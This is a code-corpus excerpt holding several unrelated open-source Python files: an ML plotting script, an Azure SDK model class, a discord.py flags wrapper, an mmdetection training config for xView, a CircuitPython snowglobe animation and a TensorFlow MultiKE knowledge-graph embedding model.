print("Actual Best: ", np.min(data_target_loss_valid))
print("____________________________________________________________________________")
orient_line = np.linspace(min_v, max_v, 100)
for ax in axs:
ax.plot(orient_line, orient_line, color='k')
ax.set_xlim([min_v, max_v])
ax.set_ylim([min_v, max_v])
# axs[0].set_title('GP Mean')
# axs[1].set_title('Hyper-train fixed')
# axs[2].set_title('Hyper-train')
axs[0].set_ylabel('Inferred Loss')
#axs[1].set_xlabel('True loss')
axs[1].set_yticks([])
axs[2].set_yticks([])
axs[0].set_xticks([.7, .8, .9, 1.0])
axs[1].set_xticks([.7, .8, .9, 1.0])
axs[2].set_xticks([.7, .8, .9, 1.0])
axs[0].set_yticks([.7, .8, .9, 1.0])
setup_ax_and_save(axs, fig, 'learn_vs_true_loss_scatter', do_xticks=False, do_yticks=False, y_mod=750.0, dpi=300)
for key, ax in enumerate(axs):
#if key is 0:
extent = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
fig.savefig('figures/ax' + str(key) + '_scatter.png', bbox_inches=extent.expanded(1.32, 1.15))
fig.savefig('figures/ax' + str(key) + '_scatter.pdf', bbox_inches=extent.expanded(1.32, 1.15))
#else:
#extent = full_extent(ax, do_yticks=False).transformed(fig.dpi_scale_trans.inverted())
#fig.savefig('figures/ax' + str(key) + '_scatter.png', bbox_inches=extent.expanded(1.0, 1.15))
print("Drawing the histograms...")
[ax.cla() for ax in axs]
bins = 50
axs[0].hist(gp_loss_predictions - data_target_loss_valid, bins=bins, color='r', normed=True, edgecolor='r')
axs[1].hist(loss_weight_predictions_loss_target - data_target_loss_valid, bins=bins, color='g', normed=True,
edgecolor='g')
axs[2].hist(loss_weight_predictions_loss - data_target_loss_valid, bins=bins, color='b', normed=True, edgecolor='b')
axs[0].set_ylabel('Frequency')
axs[1].set_xlabel('Inferred - true loss')
y_min, y_max = 10e32, -10e32
for ax in axs:
ylim = ax.get_ylim()
y_min, y_max = np.minimum(y_min, ylim[0]), np.maximum(y_max, ylim[1])
x_min, x_max = -0.35, 0.6
for ax in axs:
ax.set_xlim([x_min, x_max]), ax.set_ylim([y_min, y_max])
ax.axvline(0, ymax=1.0, linestyle='--', color='Black')
setup_ax_and_save(axs, fig, 'learn_vs_true_loss_hist', do_xticks=False)
for key, ax in enumerate(axs):
extent = full_extent(ax).transformed(fig.dpi_scale_trans.inverted())
        if key == 0:
fig.savefig('figures/ax' + str(key) + '_hist.png', bbox_inches=extent) #.expand(1.32, 1.15))
fig.savefig('figures/ax' + str(key) + '_hist.pdf', bbox_inches=extent)
else:
fig.savefig('figures/ax' + str(key) + '_hist.png', bbox_inches=extent)
fig.savefig('figures/ax' + str(key) + '_hist.pdf', bbox_inches=extent)
if __name__ == '__main__':
params = opt_params(None)
n_data, n_data_val, n_data_test = 50000, params['n_data_val'], params['n_data_test']
_, train_images, train_labels, test_images, test_labels = load_mnist()
train_data = (train_images[:n_data], train_labels[:n_data])
valid_data = (train_images[n_data:n_data + n_data_val], train_labels[n_data:n_data + n_data_val])
test_data = (test_images[:n_data_test], test_labels[:n_data_test])
# Define information about the optimization procedure and networks.
init_scale = 0.00001 # The scale (positive float) for the hypernetwork initialization.
num_iters = 5000 # The number of iterations to do the optimization for (integer).
step_size = 0.0001 # The step size for the hyperparameter optimizer (positive float).
num_iters_hypernet = 500 # The number of iterations to optimize the hypernetwork for (integer).
batch_size_data = 25 # [10, 25, 100, 250, 1000, 25]
experiment(train_data, valid_data, init_scale, num_iters_hypernet, params['step_size_hypernet'], step_size,
num_iters, batch_size_data, params['global_seed'])
| 51.685131 | 124 | 0.688008 |
4a1f77c4d7d09adc1312e8c4409ac7501b2279a5 | 1,435 | py | Python | azure-mgmt-compute/azure/mgmt/compute/v2018_10_01/models/boot_diagnostics.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2021-09-07T18:36:04.000Z | 2021-09-07T18:36:04.000Z | azure-mgmt-compute/azure/mgmt/compute/v2018_10_01/models/boot_diagnostics.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2019-10-02T23:37:38.000Z | 2020-10-02T01:17:31.000Z | azure-mgmt-compute/azure/mgmt/compute/v2018_10_01/models/boot_diagnostics.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2019-06-17T22:18:23.000Z | 2019-06-17T22:18:23.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class BootDiagnostics(Model):
"""Boot Diagnostics is a debugging feature which allows you to view Console
Output and Screenshot to diagnose VM status. <br><br> You can easily view
the output of your console log. <br><br> Azure also enables you to see a
screenshot of the VM from the hypervisor.
:param enabled: Whether boot diagnostics should be enabled on the Virtual
Machine.
:type enabled: bool
:param storage_uri: Uri of the storage account to use for placing the
console output and screenshot.
:type storage_uri: str
"""
_attribute_map = {
'enabled': {'key': 'enabled', 'type': 'bool'},
'storage_uri': {'key': 'storageUri', 'type': 'str'},
}
def __init__(self, **kwargs):
super(BootDiagnostics, self).__init__(**kwargs)
self.enabled = kwargs.get('enabled', None)
self.storage_uri = kwargs.get('storage_uri', None)
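
# --- Editorial usage sketch (not part of the generated SDK file) ---
# The model is a simple keyword-argument container; a diagnostics profile
# would typically be built like this (the storage URI is a placeholder):
#
#   boot_diagnostics = BootDiagnostics(
#       enabled=True,
#       storage_uri='https://mystorageaccount.blob.core.windows.net/')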
| 37.763158 | 79 | 0.6223 |
4a1f7885f54cfe81004a9025139e118ef6a92314 | 1,167 | py | Python | app/flags.py | CircuitsBots/Starboard-2 | 0c5510f210a387d1173ff20743648a47e4110780 | [
"MIT"
] | 16 | 2021-01-19T19:12:00.000Z | 2021-12-21T12:00:04.000Z | app/flags.py | Davi-the-Mudkip/Starboard-2 | 4de3c689ffef007e4f4a279251d107d890b69b15 | [
"MIT"
] | 15 | 2021-04-02T16:58:48.000Z | 2022-03-28T06:09:49.000Z | app/flags.py | Davi-the-Mudkip/Starboard-2 | 4de3c689ffef007e4f4a279251d107d890b69b15 | [
"MIT"
] | 13 | 2021-01-21T14:26:00.000Z | 2021-09-29T18:55:17.000Z | from discord.ext import flags
from discord.ext.flags import * # noqa F401
class FlagCommand(flags.FlagCommand):
def __init__(self, *args, **kwargs):
self._help = kwargs.pop("help", None)
super().__init__(*args, **kwargs)
@property
def help(self):
return str(self._help)
@help.setter
def help(self, *args, **kwargs):
pass
class FlagGroup(flags.FlagGroup):
def __init__(self, *args, **kwargs):
self._help = kwargs.pop("help", None)
super().__init__(*args, **kwargs)
@property
def help(self):
return str(self._help)
@help.setter
def help(self, *args, **kwargs):
pass
def command(self, *args, **kwargs):
kwargs.setdefault("cls", FlagCommand)
return super().command(*args, **kwargs)
def group(self, *args, **kwargs):
kwargs.setdefault("cls", FlagGroup)
return super().group(*args, **kwargs)
def command(*args, **kwargs):
kwargs.setdefault("cls", FlagCommand)
return flags.command(*args, **kwargs)
def group(*args, **kwargs):
kwargs.setdefault("cls", FlagGroup)
return flags.group(*args, **kwargs)
| 23.816327 | 47 | 0.615253 |
4a1f7967e8cf27cd91aace9b50d012b030b4b08b | 4,980 | py | Python | mmdet_configs/xview_vfnet/vfnet_crop_300_500_cls_60.py | fcakyon/sahi-benchmark | 8ffa43afb23adb914f2ba8b4bb45dd9ce1284c42 | [
"MIT"
] | 7 | 2021-12-20T05:22:56.000Z | 2022-03-28T01:57:10.000Z | mmdet_configs/xview_vfnet/vfnet_crop_300_500_cls_60.py | fcakyon/sahi-benchmark | 8ffa43afb23adb914f2ba8b4bb45dd9ce1284c42 | [
"MIT"
] | 1 | 2022-03-19T14:52:38.000Z | 2022-03-21T13:19:05.000Z | mmdet_configs/xview_vfnet/vfnet_crop_300_500_cls_60.py | fcakyon/sahi-benchmark | 8ffa43afb23adb914f2ba8b4bb45dd9ce1284c42 | [
"MIT"
] | 3 | 2022-02-23T12:26:18.000Z | 2022-03-27T14:06:58.000Z | _base_ = ["../vfnet/vfnet_r50_fpn_1x_coco.py"]
EXP_NAME = "vfnet_crop_300_500_cls_60"
DATA_ROOT = "data/xview/"
BATCH_MULTIPLIER = 8
LR_MULTIPLIER = 1
EVAL_INTERVAL = 3
NUM_CLASSES = 60
DATASET_REPEAT = 50
TAGS = ["vfnet", "crop=300_500", "24epochs", f"num_cls={NUM_CLASSES}", f"repeat={DATASET_REPEAT}"]
CLASSES = (
"Fixed-wing Aircraft",
"Small Aircraft",
"Cargo Plane",
"Helicopter",
"Passenger Vehicle",
"Small Car",
"Bus",
"Pickup Truck",
"Utility Truck",
"Truck",
"Cargo Truck",
"Truck w/Box",
"Truck Tractor",
"Trailer",
"Truck w/Flatbed",
"Truck w/Liquid",
"Crane Truck",
"Railway Vehicle",
"Passenger Car",
"Cargo Car",
"Flat Car",
"Tank car",
"Locomotive",
"Maritime Vessel",
"Motorboat",
"Sailboat",
"Tugboat",
"Barge",
"Fishing Vessel",
"Ferry",
"Yacht",
"Container Ship",
"Oil Tanker",
"Engineering Vehicle",
"Tower crane",
"Container Crane",
"Reach Stacker",
"Straddle Carrier",
"Mobile Crane",
"Dump Truck",
"Haul Truck",
"Scraper/Tractor",
"Front loader/Bulldozer",
"Excavator",
"Cement Mixer",
"Ground Grader",
"Hut/Tent",
"Shed",
"Building",
"Aircraft Hangar",
"Damaged Building",
"Facility",
"Construction Site",
"Vehicle Lot",
"Helipad",
"Storage Tank",
"Shipping container lot",
"Shipping Container",
"Pylon",
"Tower",
)
# model settings
model = dict(
bbox_head=dict(
num_classes=NUM_CLASSES,
),
)
# dataset settings
img_norm_cfg = dict(mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type="LoadImageFromFile"),
dict(type="LoadAnnotations", with_bbox=True),
dict(
type="AutoAugment",
policies=[
[
dict(type="RandomCrop", crop_type="absolute_range", crop_size=(300, 500), allow_negative_crop=True),
dict(type="Resize", img_scale=(1333, 800), keep_ratio=True),
],
[
dict(type="RandomCrop", crop_type="absolute_range", crop_size=(300, 500), allow_negative_crop=True),
dict(type="Resize", img_scale=(1333, 800), keep_ratio=True),
],
[
dict(type="RandomCrop", crop_type="absolute_range", crop_size=(300, 500), allow_negative_crop=True),
dict(type="Resize", img_scale=(1333, 800), keep_ratio=True),
],
[
dict(type="Resize", img_scale=(1333, 800), keep_ratio=True),
],
],
),
dict(type="RandomFlip", flip_ratio=0.5),
dict(type="Normalize", **img_norm_cfg),
dict(type="Pad", size_divisor=32),
dict(type="DefaultFormatBundle"),
dict(type="Collect", keys=["img", "gt_bboxes", "gt_labels"]),
]
test_pipeline = [
dict(type="LoadImageFromFile"),
dict(
type="MultiScaleFlipAug",
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type="Resize", keep_ratio=True),
dict(type="RandomFlip"),
dict(type="Normalize", **img_norm_cfg),
dict(type="Pad", size_divisor=32),
dict(type="DefaultFormatBundle"),
dict(type="Collect", keys=["img"]),
],
),
]
data = dict(
samples_per_gpu=2 * BATCH_MULTIPLIER,
workers_per_gpu=2,
train=dict(
type="RepeatDataset",
times=DATASET_REPEAT,
dataset=dict(
type="CocoDataset",
classes=CLASSES,
ann_file=DATA_ROOT + "coco/train.json",
img_prefix=DATA_ROOT + "train_images/",
pipeline=train_pipeline,
),
),
val=dict(
classes=CLASSES,
ann_file=DATA_ROOT + "sliced/val_400_0.json",
img_prefix=DATA_ROOT + "sliced/val_images_400_0/",
pipeline=test_pipeline,
),
test=dict(
classes=CLASSES,
ann_file=DATA_ROOT + "sliced/val_400_0.json",
img_prefix=DATA_ROOT + "sliced/val_images_400_0/",
pipeline=test_pipeline,
),
)
# optimizer
# the stock mmdetection lr of 0.01 assumes 8 GPUs,
# so it is divided by 8 here for single-GPU training and rescaled by the multipliers
optimizer = dict(
lr=0.01 / 8 * BATCH_MULTIPLIER * LR_MULTIPLIER, paramwise_cfg=dict(bias_lr_mult=2.0, bias_decay_mult=0.0)
)
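# Editorial note: with the values above (BATCH_MULTIPLIER=8, LR_MULTIPLIER=1)
# this works out to lr = 0.01 / 8 * 8 * 1 = 0.01, i.e. the stock 8-GPU learning
# rate, which matches the 8x samples_per_gpu set in `data` above.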
checkpoint_config = dict(interval=1, max_keep_ckpts=1, save_optimizer=False)
evaluation = dict(interval=EVAL_INTERVAL, metric="bbox", save_best="auto")
# learning policy
lr_config = dict(policy="step", warmup="linear", warmup_iters=500, warmup_ratio=0.1, step=[16, 22])
runner = dict(type="EpochBasedRunner", max_epochs=24)
# logger settings
log_config = dict(
interval=50,
hooks=[
dict(type="TextLoggerHook"),
dict(type="TensorboardLoggerHook", reset_flag=False),
],
)
load_from = "https://download.openmmlab.com/mmdetection/v2.0/vfnet/vfnet_r50_fpn_1x_coco/vfnet_r50_fpn_1x_coco_20201027-38db6f58.pth"
work_dir = f"runs/xview/{EXP_NAME}/"
| 27.213115 | 133 | 0.603213 |
4a1f7a353c385041bf0d6a2fd6635d00bb480730 | 5,625 | py | Python | TFT_Gizmo_Snowglobe/snowglobe_fancy/code.py | albinger/Adafruit_Learning_System_Guides | 4fe2da261fe5d1ca282b86bd3b93ee1466346fa7 | [
"MIT"
] | null | null | null | TFT_Gizmo_Snowglobe/snowglobe_fancy/code.py | albinger/Adafruit_Learning_System_Guides | 4fe2da261fe5d1ca282b86bd3b93ee1466346fa7 | [
"MIT"
] | null | null | null | TFT_Gizmo_Snowglobe/snowglobe_fancy/code.py | albinger/Adafruit_Learning_System_Guides | 4fe2da261fe5d1ca282b86bd3b93ee1466346fa7 | [
"MIT"
] | null | null | null | # SPDX-FileCopyrightText: 2019 Carter Nelson for Adafruit Industries
#
# SPDX-License-Identifier: MIT
from random import randrange
import board
import busio
import displayio
from adafruit_gizmo import tft_gizmo
import adafruit_imageload
import adafruit_lis3dh
#---| User Config |---------------
BACKGROUND = "/blinka_dark.bmp" # specify color or background BMP file
NUM_FLAKES = 50 # total number of snowflakes
FLAKE_SHEET = "/flakes_sheet.bmp" # flake sprite sheet
FLAKE_WIDTH = 4 # sprite width
FLAKE_HEIGHT = 4 # sprite height
FLAKE_TRAN_COLOR = 0x000000 # transparency color
SNOW_COLOR = 0xFFFFFF # snow color
SHAKE_THRESHOLD = 27 # shake sensitivity, lower=more sensitive
#---| User Config |---------------
# Accelerometer setup
accelo_i2c = busio.I2C(board.ACCELEROMETER_SCL, board.ACCELEROMETER_SDA)
accelo = adafruit_lis3dh.LIS3DH_I2C(accelo_i2c, address=0x19)
# Create the TFT Gizmo display
display = tft_gizmo.TFT_Gizmo()
# Load background image
try:
bg_bitmap, bg_palette = adafruit_imageload.load(BACKGROUND,
bitmap=displayio.Bitmap,
palette=displayio.Palette)
# Or just use solid color
except (OSError, TypeError, AttributeError):
BACKGROUND = BACKGROUND if isinstance(BACKGROUND, int) else 0x000000
bg_bitmap = displayio.Bitmap(display.width, display.height, 1)
bg_palette = displayio.Palette(1)
bg_palette[0] = BACKGROUND
background = displayio.TileGrid(bg_bitmap, pixel_shader=bg_palette)
# Snowflake setup
flake_bitmap, flake_palette = adafruit_imageload.load(FLAKE_SHEET,
bitmap=displayio.Bitmap,
palette=displayio.Palette)
if FLAKE_TRAN_COLOR is not None:
for i, color in enumerate(flake_palette):
if color == FLAKE_TRAN_COLOR:
flake_palette.make_transparent(i)
break
NUM_SPRITES = flake_bitmap.width // FLAKE_WIDTH * flake_bitmap.height // FLAKE_HEIGHT
flake_pos = [0.0] * NUM_FLAKES
flakes = displayio.Group()
for _ in range(NUM_FLAKES):
flakes.append(displayio.TileGrid(flake_bitmap, pixel_shader=flake_palette,
width = 1,
height = 1,
tile_width = FLAKE_WIDTH,
tile_height = FLAKE_HEIGHT,
x = randrange(0, display.width),
default_tile=randrange(0, NUM_SPRITES)))
# Snowfield setup
snow_depth = [display.height] * display.width
snow_palette = displayio.Palette(2)
snow_palette[0] = 0xADAF00 # transparent color
snow_palette[1] = SNOW_COLOR # snow color
snow_palette.make_transparent(0)
snow_bitmap = displayio.Bitmap(display.width, display.height, len(snow_palette))
snow = displayio.TileGrid(snow_bitmap, pixel_shader=snow_palette)
# Add everything to display
splash = displayio.Group()
splash.append(background)
splash.append(flakes)
splash.append(snow)
display.show(splash)
def clear_the_snow():
#pylint: disable=global-statement, redefined-outer-name
global flakes, flake_pos, snow_depth
display.auto_refresh = False
for flake in flakes:
# set to a random sprite
flake[0] = randrange(0, NUM_SPRITES)
# set to a random x location
flake.x = randrange(0, display.width)
# set random y locations, off screen to start
flake_pos = [-1.0*randrange(0, display.height) for _ in range(NUM_FLAKES)]
# reset snow level
snow_depth = [display.height] * display.width
# and snow bitmap
for i in range(display.width*display.height):
snow_bitmap[i] = 0
display.auto_refresh = True
def add_snow(index, amount, steepness=2):
location = []
# local steepness check
for x in range(index - amount, index + amount):
add = False
if x == 0:
# check depth to right
if snow_depth[x+1] - snow_depth[x] < steepness:
add = True
elif x == display.width - 1:
# check depth to left
if snow_depth[x-1] - snow_depth[x] < steepness:
add = True
elif 0 < x < display.width - 1:
# check depth to left AND right
if snow_depth[x-1] - snow_depth[x] < steepness and \
snow_depth[x+1] - snow_depth[x] < steepness:
add = True
if add:
location.append(x)
# add where snow is not too steep
for x in location:
new_level = snow_depth[x] - 1
if new_level >= 0:
snow_depth[x] = new_level
snow_bitmap[x, new_level] = 1
while True:
clear_the_snow()
# loop until globe is full of snow
while snow_depth.count(0) < display.width:
# check for shake
if accelo.shake(SHAKE_THRESHOLD, 5, 0):
break
# update snowflakes
for i, flake in enumerate(flakes):
# speed based on sprite index
flake_pos[i] += 1 - flake[0] / NUM_SPRITES
# check if snowflake has hit the ground
if flake_pos[i] >= snow_depth[flake.x]:
# add snow where it fell
add_snow(flake.x, FLAKE_WIDTH)
# reset flake to top
flake_pos[i] = 0
# at a new x location
flake.x = randrange(0, display.width)
flake.y = int(flake_pos[i])
display.refresh()
| 37.251656 | 85 | 0.610311 |
4a1f7a703480261ceb5adca7af5d305bb3272907 | 28,804 | py | Python | code/MultiKE_model.py | DuanXu-97/MultiKE | a210a0c638ef4d91562bf098acb7153028dd74fc | [
"MIT"
] | 1 | 2020-06-23T07:32:31.000Z | 2020-06-23T07:32:31.000Z | code/MultiKE_model.py | DuanXu-97/MultiKE | a210a0c638ef4d91562bf098acb7153028dd74fc | [
"MIT"
] | null | null | null | code/MultiKE_model.py | DuanXu-97/MultiKE | a210a0c638ef4d91562bf098acb7153028dd74fc | [
"MIT"
] | null | null | null | import math
import random
import multiprocessing as mp
import base.batch as bat
from utils import *
from base.initializers import xavier_init
from attr_batch import generate_attribute_triple_batch_queue
from utils import save_embeddings
from losses import relation_logistic_loss, attribute_logistic_loss, relation_logistic_loss_wo_negs, \
attribute_logistic_loss_wo_negs, space_mapping_loss, alignment_loss, logistic_loss_wo_negs, orthogonal_loss
def get_optimizer(opt, learning_rate):
if opt == 'Adagrad':
optimizer = tf.train.AdagradOptimizer(learning_rate)
elif opt == 'Adadelta':
# To match the exact form in the original paper use 1.0.
optimizer = tf.train.AdadeltaOptimizer(learning_rate)
elif opt == 'Adam':
optimizer = tf.train.AdamOptimizer(learning_rate)
else: # opt == 'SGD'
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
return optimizer
def generate_optimizer(loss, learning_rate, var_list=None, opt='SGD'):
optimizer = get_optimizer(opt, learning_rate)
grads_and_vars = optimizer.compute_gradients(loss, var_list=var_list)
return optimizer.apply_gradients(grads_and_vars)
def conv(attr_hs, attr_as, attr_vs, dim, feature_map_size=2, kernel_size=[2, 4], activation=tf.nn.tanh, layer_num=2):
# print("feature map size", feature_map_size)
# print("kernel size", kernel_size)
# print("layer_num", layer_num)
attr_as = tf.reshape(attr_as, [-1, 1, dim])
attr_vs = tf.reshape(attr_vs, [-1, 1, dim])
input_avs = tf.concat([attr_as, attr_vs], 1)
input_shape = input_avs.shape.as_list()
input_layer = tf.reshape(input_avs, [-1, input_shape[1], input_shape[2], 1])
# print("input_layer", input_layer.shape)
_conv = input_layer
_conv = tf.layers.batch_normalization(_conv, 2)
for i in range(layer_num):
_conv = tf.layers.conv2d(inputs=_conv,
filters=feature_map_size,
kernel_size=kernel_size,
strides=[1, 1],
padding="same",
activation=activation)
# print("conv" + str(i + 1), _conv.shape)
_conv = tf.nn.l2_normalize(_conv, 2)
_shape = _conv.shape.as_list()
_flat = tf.reshape(_conv, [-1, _shape[1] * _shape[2] * _shape[3]])
# print("_flat", _flat.shape)
dense = tf.layers.dense(inputs=_flat, units=dim, activation=activation)
dense = tf.nn.l2_normalize(dense) # important!!
# print("dense", dense.shape)
score = -tf.reduce_sum(tf.square(attr_hs - dense), 1)
return score
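
# Editorial note: `conv` scores an attribute triple (h, a, v) as
#   score = -|| h - CNN([a; v]) ||_2^2,
# i.e. the negative squared distance between the head-entity embedding and a
# CNN encoding of the concatenated attribute and literal-value vectors.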
class MultiKE:
def __check_args(self):
assert self.args.alignment_module == 'swapping' # for cross-KG inference
def __init__(self, data, args, attr_align_model):
self.predicate_align_model = attr_align_model
self.args = args
self.__check_args()
self.data = data
self.kgs = kgs = data.kgs
self.kg1 = kgs.kg1
self.kg2 = kgs.kg2
self.out_folder = generate_out_folder(self.args.output, self.args.training_data, '', self.__class__.__name__)
self.session = None
def _define_variables(self):
with tf.variable_scope('literal' + 'embeddings'):
self.literal_embeds = tf.constant(self.data.value_vectors, dtype=tf.float32)
with tf.variable_scope('name_view' + 'embeddings'):
self.name_embeds = tf.constant(self.data.local_name_vectors, dtype=tf.float32)
with tf.variable_scope('relation_view' + 'embeddings'):
self.rv_ent_embeds = xavier_init([self.kgs.entities_num, self.args.dim], 'rv_ent_embeds', True)
self.rel_embeds = xavier_init([self.kgs.relations_num, self.args.dim], 'rel_embeds', True)
with tf.variable_scope('attribute_view' + 'embeddings'):
self.av_ent_embeds = xavier_init([self.kgs.entities_num, self.args.dim], 'av_ent_embeds', True)
# False important!
self.attr_embeds = xavier_init([self.kgs.attributes_num, self.args.dim], 'attr_embeds', False)
with tf.variable_scope('shared' + 'embeddings'):
self.ent_embeds = xavier_init([self.kgs.entities_num, self.args.dim], 'ent_embeds', True)
with tf.variable_scope('shared' + 'combination'):
self.nv_mapping = tf.get_variable('nv_mapping', shape=[self.args.dim, self.args.dim],
initializer=tf.initializers.orthogonal())
self.rv_mapping = tf.get_variable('rv_mapping', shape=[self.args.dim, self.args.dim],
initializer=tf.initializers.orthogonal())
self.av_mapping = tf.get_variable('av_mapping', shape=[self.args.dim, self.args.dim],
initializer=tf.initializers.orthogonal())
self.eye_mat = tf.constant(np.eye(self.args.dim), dtype=tf.float32, name='eye')
    # --- The following are view-specific embedding models --- #
def _define_name_view_graph(self):
pass
def _define_relation_view_graph(self):
with tf.name_scope('relation_triple_placeholder'):
self.rel_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.rel_pos_rs = tf.placeholder(tf.int32, shape=[None])
self.rel_pos_ts = tf.placeholder(tf.int32, shape=[None])
self.rel_neg_hs = tf.placeholder(tf.int32, shape=[None])
self.rel_neg_rs = tf.placeholder(tf.int32, shape=[None])
self.rel_neg_ts = tf.placeholder(tf.int32, shape=[None])
with tf.name_scope('relation_triple_lookup'):
rel_phs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.rel_pos_hs)
rel_prs = tf.nn.embedding_lookup(self.rel_embeds, self.rel_pos_rs)
rel_pts = tf.nn.embedding_lookup(self.rv_ent_embeds, self.rel_pos_ts)
rel_nhs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.rel_neg_hs)
rel_nrs = tf.nn.embedding_lookup(self.rel_embeds, self.rel_neg_rs)
rel_nts = tf.nn.embedding_lookup(self.rv_ent_embeds, self.rel_neg_ts)
with tf.name_scope('relation_triple_loss'):
self.relation_loss = relation_logistic_loss(rel_phs, rel_prs, rel_pts, rel_nhs, rel_nrs, rel_nts)
self.relation_optimizer = generate_optimizer(self.relation_loss, self.args.learning_rate,
opt=self.args.optimizer)
def _define_attribute_view_graph(self):
with tf.name_scope('attribute_triple_placeholder'):
self.attr_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.attr_pos_as = tf.placeholder(tf.int32, shape=[None])
self.attr_pos_vs = tf.placeholder(tf.int32, shape=[None])
self.attr_pos_ws = tf.placeholder(tf.float32, shape=[None])
with tf.name_scope('attribute_triple_lookup'):
attr_phs = tf.nn.embedding_lookup(self.av_ent_embeds, self.attr_pos_hs)
attr_pas = tf.nn.embedding_lookup(self.attr_embeds, self.attr_pos_as)
attr_pvs = tf.nn.embedding_lookup(self.literal_embeds, self.attr_pos_vs)
with tf.variable_scope('cnn'):
pos_score = conv(attr_phs, attr_pas, attr_pvs, self.args.dim)
pos_score = tf.log(1 + tf.exp(-pos_score))
pos_score = tf.multiply(pos_score, self.attr_pos_ws)
pos_loss = tf.reduce_sum(pos_score)
self.attribute_loss = pos_loss
self.attribute_optimizer = generate_optimizer(self.attribute_loss, self.args.learning_rate,
opt=self.args.optimizer)
    # --- The following are cross-kg identity inference --- #
def _define_cross_kg_name_view_graph(self):
pass
def _define_cross_kg_entity_reference_relation_view_graph(self):
with tf.name_scope('cross_kg_relation_triple_placeholder'):
self.ckge_rel_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.ckge_rel_pos_rs = tf.placeholder(tf.int32, shape=[None])
self.ckge_rel_pos_ts = tf.placeholder(tf.int32, shape=[None])
with tf.name_scope('cross_kg_relation_triple_lookup'):
ckge_rel_phs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.ckge_rel_pos_hs)
ckge_rel_prs = tf.nn.embedding_lookup(self.rel_embeds, self.ckge_rel_pos_rs)
ckge_rel_pts = tf.nn.embedding_lookup(self.rv_ent_embeds, self.ckge_rel_pos_ts)
with tf.name_scope('cross_kg_relation_triple_loss'):
self.ckge_relation_loss = 2 * relation_logistic_loss_wo_negs(ckge_rel_phs, ckge_rel_prs, ckge_rel_pts)
self.ckge_relation_optimizer = generate_optimizer(self.ckge_relation_loss, self.args.learning_rate,
opt=self.args.optimizer)
def _define_cross_kg_entity_reference_attribute_view_graph(self):
with tf.name_scope('cross_kg_attribute_triple_placeholder'):
self.ckge_attr_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.ckge_attr_pos_as = tf.placeholder(tf.int32, shape=[None])
self.ckge_attr_pos_vs = tf.placeholder(tf.int32, shape=[None])
with tf.name_scope('cross_kg_attribute_triple_lookup'):
ckge_attr_phs = tf.nn.embedding_lookup(self.av_ent_embeds, self.ckge_attr_pos_hs)
ckge_attr_pas = tf.nn.embedding_lookup(self.attr_embeds, self.ckge_attr_pos_as)
ckge_attr_pvs = tf.nn.embedding_lookup(self.literal_embeds, self.ckge_attr_pos_vs)
with tf.name_scope('cross_kg_attribute_triple_loss'):
pos_score = conv(ckge_attr_phs, ckge_attr_pas, ckge_attr_pvs, self.args.dim)
self.ckge_attribute_loss = 2 * tf.reduce_sum(tf.log(1 + tf.exp(-pos_score)))
self.ckge_attribute_optimizer = generate_optimizer(self.ckge_attribute_loss, self.args.learning_rate,
opt=self.args.optimizer)
def _define_cross_kg_relation_reference_graph(self):
with tf.name_scope('cross_kg_relation_reference_placeholder'):
self.ckgp_rel_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.ckgp_rel_pos_rs = tf.placeholder(tf.int32, shape=[None])
self.ckgp_rel_pos_ts = tf.placeholder(tf.int32, shape=[None])
self.ckgp_rel_pos_ws = tf.placeholder(tf.float32, shape=[None])
with tf.name_scope('cross_kg_relation_reference_lookup'):
ckgp_rel_phs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.ckgp_rel_pos_hs)
ckgp_rel_prs = tf.nn.embedding_lookup(self.rel_embeds, self.ckgp_rel_pos_rs)
ckgp_rel_pts = tf.nn.embedding_lookup(self.rv_ent_embeds, self.ckgp_rel_pos_ts)
with tf.name_scope('cross_kg_relation_reference_loss'):
self.ckgp_relation_loss = 2 * logistic_loss_wo_negs(ckgp_rel_phs, ckgp_rel_prs, ckgp_rel_pts,
self.ckgp_rel_pos_ws)
self.ckgp_relation_optimizer = generate_optimizer(self.ckgp_relation_loss, self.args.learning_rate,
opt=self.args.optimizer)
def _define_cross_kg_attribute_reference_graph(self):
with tf.name_scope('cross_kg_attribute_reference_placeholder'):
self.ckga_attr_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.ckga_attr_pos_as = tf.placeholder(tf.int32, shape=[None])
self.ckga_attr_pos_vs = tf.placeholder(tf.int32, shape=[None])
self.ckga_attr_pos_ws = tf.placeholder(tf.float32, shape=[None])
with tf.name_scope('cross_kg_attribute_reference_lookup'):
ckga_attr_phs = tf.nn.embedding_lookup(self.av_ent_embeds, self.ckga_attr_pos_hs)
ckga_attr_pas = tf.nn.embedding_lookup(self.attr_embeds, self.ckga_attr_pos_as)
ckga_attr_pvs = tf.nn.embedding_lookup(self.literal_embeds, self.ckga_attr_pos_vs)
with tf.name_scope('cross_kg_attribute_reference_loss'):
pos_score = conv(ckga_attr_phs, ckga_attr_pas, ckga_attr_pvs, self.args.dim)
pos_score = tf.log(1 + tf.exp(-pos_score))
pos_score = tf.multiply(pos_score, self.ckga_attr_pos_ws)
pos_loss = tf.reduce_sum(pos_score)
self.ckga_attribute_loss = pos_loss
# self.ckga_attribute_loss = tf.reduce_sum(tf.log(1 + tf.exp(-pos_score)))
